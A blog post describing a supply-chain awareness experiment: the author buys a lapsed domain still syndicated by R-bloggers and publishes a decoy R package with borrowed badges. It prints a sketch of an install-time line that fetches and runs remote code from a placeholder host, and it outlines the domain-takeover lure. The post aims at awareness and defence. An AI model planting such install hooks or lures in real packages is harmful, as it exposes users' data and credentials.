
R Packages: Are we too trusting?

Published: February 4, 2019


One of the great things about R is the myriad of packages available. Packages are typically installed via

  • CRAN
  • Bioconductor
  • GitHub

But how often do we think about what we are installing? Do we pay attention, or do we just install anything that looks neat? Do we think about security, or do we just assume that everything is safe? In this post, we conducted a slightly nefarious experiment to see if people pay attention to what they install.

R-bloggers: The hook

R-bloggers is a great resource for keeping on top of what’s happening in the world of R. It’s one of the resources we recommend whenever we run training courses. For an author to get their site syndicated to R-bloggers, they have to email Tal, who will ensure that the site isn’t spammy. I recently saw a tweet (I can’t remember who from) suggesting, tongue in cheek, that to boost your website ranking you could just grab a site that used to appear on R-bloggers.

This gave me an idea for something a bit more devious! Instead of boosting website traffic, could we grab a domain, create a dummy R package, then monitor who installs the package?

A list of contributing sites is nicely provided by R-bloggers, so a quick and dirty script can identify target domains. First, we load a few packages:

library(httr)
library(tidyverse)
library(rvest)

Then extract all URLs from the page

page_source = "https://www.r-bloggers.com/blogs-list/"  %>%
  read_html()
urls = html_attr(html_nodes(page_source, "a"), "href")

With a little helper function to get the status code

# If a site is available, it should return 200
get_status_code = function(url) {
  # try() catches unreachable hosts (DNS failures, timeouts, etc.)
  status = try(GET(url)$status_code, silent = TRUE)
  if (inherits(status, "try-error"))
    status = NA
  status
}

we simply probe each URL

# Lots of threads
status_codes = parallel::mclapply(urls, get_status_code, mc.cores = 24)
status_codes = unlist(status_codes)

In total, there were 43 URLs that did not return the required status code of 200:

tibble(urls = urls, status_codes = status_codes) %>%
   filter(!is.na(status_codes)) %>%
   filter(status_codes != 200) %>%
   head()
# A tibble: 6 x 2
  urls                                                     status_codes
  <chr>                                                           <int>
1 http://www.56n.dk                                                 406
2 http://bio7.org/                                                  403
3 http://www.seascapemodels.org/bluecology_blog/index.html          404
4 https://climateecology.wordpress.com                              410
5 http://www.compmath.com/blog                                      500
6 https://hamiltonblake.github.io                                   404
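
As a quick sanity check, the figure of 43 quoted above comes from counting the failures in the same status_codes vector:

# Count the sites that responded, but not with a 200 (NAs excluded)
sum(status_codes != 200, na.rm = TRUE)
[1] 43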

In the end, we went with vinux.in. According to the Wayback Machine, the site seems to have died around 2017. The cost of claiming the domain was £10 for the year.

By claiming this site, I automatically got a site with incoming traffic. One evil strategy would be to simply sit back and collect traffic from R-bloggers.

{blogdown} & {ggplot2}: The bait

Next, I created a GitLab user rstatsgit and a blog via the excellent {blogdown} package. Now clearly we need something to entice people to run our code, so I created a very simple R package that scans {ggplot2} themes. Nothing fancy, only a dozen lines of code or so. In case someone looked at the repository page, I just copied a few badges from other packages to make it look more genuine. I used Netlify to link our new blog to the recently purchased domain. The resulting blog doesn’t look too bad at all.
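
The package’s actual code isn’t shown here, but a minimal sketch of this sort of theme scanner might look something like the following (scan_themes() is a made-up name, not the real function from the dummy package):

# Hypothetical sketch of a dozen-line "theme scanner"
scan_themes = function() {
  # every exported object in {ggplot2} whose name starts with "theme_"
  exports = getNamespaceExports("ggplot2")
  sort(grep("^theme_", exports, value = TRUE))
}
scan_themes()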

At the bottom of one of the .R files in the package, there is a simple source() command. This, in theory, could be used to do anything: grab data, passwords, SSH keys. Clearly, we don’t do any of this. Instead, it simply pings a site to tell us that the package has been installed.
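
Since top-level code in a package’s R/ files is evaluated when the package is installed, the trick can be as small as one line. A hedged sketch (the URL is a placeholder, not the real endpoint):

# Top-level code in R/ files runs at install time; wrapping the call in
# try() means a failed ping never breaks installation. Placeholder URL.
try(source("https://example.com/ping.R"), silent = TRUE)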

R-bloggers & Twitter: The delivery

To deliver the content, I’m going for a combination of trying to get it onto R-bloggers via the old site’s RSS feed and tweeting about the page with the #rstats hashtag.

Did people install the package?

I’ll update the blog post with results in a week or two.

Who is not to blame?

It’s instructive to think about who is not to blame:

  • GitLab/GitHub: it would be impossible for them to police the code that is uploaded to their sites.
  • {devtools} (install_git*()): there are many legitimate uses for these functions. Blaming them would be equivalent to blaming StackOverflow for bad advice; it doesn’t really make sense.
  • R-bloggers: it simply isn’t feasible to thoroughly vet every post. In the past, the site has quickly reacted to anything spammy and removed offending articles. They also have no control over what happens on the external sites they link to.
  • The person who owned the site: Nope. They owned the site. Now they don’t. They have no responsibility.

Who is to blame?

Well, I suppose I’m to blame, since I created the site and package ;) But more seriously, if you installed the package, you’re to blame! I think everyone is guilty of copying and pasting code from blogs, StackOverflow, and forums without always understanding what’s going on. But the internet is a dangerous place, and most people who use R almost certainly have juicy data that shouldn’t be released to the outside world.

By pure coincidence, I’ve noticed that Bob Rudis has started emphasising that we should be more responsible about what we install.

How to protect against this?

This is something we have been helping clients tackle over the last two years. On the one hand, companies use R to run the latest algorithms and try cutting-edge visualisation methods. On top of this, they employ bright and enthusiastic data scientists who enjoy what they do. If companies make things too restrictive, people will either find a way around the problem or simply leave.

The crucial thing to remember is that if someone really wants to do something unsafe, we can’t stop them. Instead, we need to provide safe alternatives that don’t hinder work while at the same time reducing overall risk.

When dealing with companies, we help them tackle the problem in a number of ways:

  • Education! Both of the team and the team leaders!
  • Have an internal package repository. Either we build this, or we use RStudio’s Package Manager (we’re one of the few RStudio Certified Partners in the world); see the sketch after this list.
  • We may disable tools such as install_github().
  • Reduce risk by having clear testing and deployment machines.
  • Implement two-factor authentication.
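
As a rough sketch of the internal repository idea above (the URL is a placeholder), pointing R at a vetted repository is a one-line change, typically placed in Rprofile.site so users never have to think about it:

# Point R at an internal, vetted CRAN-like repository; placeholder URL
options(repos = c(internal = "https://packages.example.com/cran/latest"))
getOption("repos")  # install.packages() now resolves against this repo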

All of the above can be circumvented by a determined data scientist. But the idea is that, with education, we can reduce the potential risk without impeding day-to-day work.